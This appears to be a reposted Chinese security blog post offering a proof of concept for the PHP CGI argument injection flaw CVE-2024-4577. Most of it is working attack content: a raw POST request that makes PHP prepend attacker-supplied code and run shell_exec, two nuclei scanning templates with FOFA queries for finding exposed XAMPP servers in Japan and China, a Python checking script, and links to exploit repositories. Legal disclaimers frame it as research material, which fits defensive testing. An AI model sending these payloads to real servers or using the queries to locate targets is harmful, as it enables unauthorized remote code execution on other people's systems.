PHP CGI 参数注入 (CVE-2024-4577) 远程代码执行 PoC

admin
admin
admin
139164
文章
114
评论
2024年6月8日19:13:03评论67 views字数 4974阅读16分34秒阅读模式
PART.01
免责声明

道一安全(本公众号)的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

PART.02
漏洞描述

攻击向量攻击者可以通过向 PHP CGI 脚本发送特制请求、注入恶意参数来执行任意命令来利用这一点。这可能会导致整个系统受损。

PART.03
fofa搜索语句

暂无

PART.04
影响版本

PHP 8.3 < 8.3.8

PHP 8.2 < 8.2.20

PHP 8.1 < 8.1.29

PART.05
漏洞复现

POC:

POST /index.php?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1Host: Content-Type: application/x-www-form-urlencoded<?php echo shell_exec("dir"); ?>

yaml:

id: CVE-2024-4577info:  name: PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution  author: Ayu  description: Allowing unauthenticated attackers to execute arbitrary code on remote XAMPP servers through specific character sequences(0xAD)  reference:    - https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html    - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/  severity: critical  tags: cve, rce, php  metadata:    fofa-query:      - 'app="XAMPP"'      - 'app="XAMPP" && country=JP'      - 'app="XAMPP" && country=CN'variables:  payload: "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"http:  - raw:    - |      POST /unfxu9a.php{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/121.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>     - |      POST /php-cgi/unfxu9a.php{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/121.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>     - |      POST /cgi-bin/php-cgi.exe{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/122.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>     - |      POST /php-cgi/php-cgi.exe{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/123.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>    - |      POST /php-cgi/php.exe{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/123.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>    - |      POST /cgi-bin/php.exe{{payload}} HTTP/1.1      Host: {{Hostname}}      Accept: */*      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/123.0      Content-Type: application/x-www-form-urlencoded      Connection: keep-alive      <?php phpinfo(); ?>    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(body, "PHP Version")'        condition: and

yaml2:

id: CVE-2024-4577info:  name: PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution  author: Ayu  description: Allowing unauthenticated attackers to execute arbitrary code on remote XAMPP servers through specific character sequences(0xAD)  reference:    - https://blog.orange.tw/2024/06/cve-2024-4577-yet-another-php-rce.html    - https://labs.watchtowr.com/no-way-php-strikes-again-cve-2024-4577/  severity: critical  tags: cve, rce, php  metadata:    fofa-query:      - 'app="XAMPP"'      - 'app="XAMPP" && country=JP'      - 'app="XAMPP" && country=CN'variables:  payload: "?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"http:  - method: POST    path:      - "{{BaseURL}}/index.php{{payload}}"      - "{{BaseURL}}/unfxu9a.php{{payload}}"      - "{{BaseURL}}/php-cgi/unfxu9a.php{{payload}}"      - "{{BaseURL}}/cgi-bin/php-cgi.exe{{payload}}"      - "{{BaseURL}}/php-cgi/php-cgi.exe{{payload}}"      - "{{BaseURL}}/php-cgi/php.exe{{payload}}"      - "{{BaseURL}}/cgi-bin/php.exe{{payload}}"    headers:      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 11.2; rv:122.0) Gecko/20000101 Firefox/122.0"      Accept: "*/*"      Content-Type: "application/x-www-form-urlencoded"      Connection: "keep-alive"    body: "<?php phpinfo(); ?>"    matchers:      - type: dsl        dsl:          - 'status_code == 200'          - 'contains(body, "PHP Version")'        condition: and

PHP CGI 参数注入 (CVE-2024-4577) 远程代码执行 PoC

Python:

import requestsimport argparsedef test_cgi_vulnerability(url):    payloads = [        '/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input',        '/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input'    ]    php_code = '<?php echo "vulnerable"; ?>'    headers = {        "Content-Type": "application/x-www-form-urlencoded"    }    for payload in payloads:        test_url = f"{url}{payload}"        try:            response = requests.post(test_url, headers=headers, data=php_code)            response_text = response.text.lower()            if "vulnerable" in response_text or "directory" in response_text or "index of" in response_text:                print(f"(+) Potential vulnerability detected at: {test_url}")            else:                print(f"(-) No vulnerability detected at: {test_url}")        except Exception as e:            print(f"(!) Error testing {test_url}: {e}")def main():    parser = argparse.ArgumentParser(description="PHP CGI Argument Injection (CVE-2024-4577) Detection Script")    parser.add_argument('--target', '-t', dest='target', help='Target URL', required=True)    args = parser.parse_args()    target_url = args.target.rstrip('/')    test_cgi_vulnerability(target_url)if __name__ == "__main__":    main()

其他下载地址:

https://github.com/watchtowrlabs/CVE-2024-4577

https://github.com/0x20c/CVE-2024-4577-nuclei

PHP CGI 参数注入 (CVE-2024-4577) 远程代码执行 PoC

群内不定期更新各种POC

PHP CGI 参数注入 (CVE-2024-4577) 远程代码执行 PoC

PHP CGI 参数注入 (CVE-2024-4577) 远程代码执行 PoC

PHP CGI 参数注入 (CVE-2024-4577) 远程代码执行 PoC

原文始发于微信公众号(道一安全):PHP CGI 参数注入 (CVE-2024-4577) 远程代码执行 PoC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月8日19:13:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PHP CGI 参数注入 (CVE-2024-4577) 远程代码执行 PoChttps://cn-sec.com/archives/2831491.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息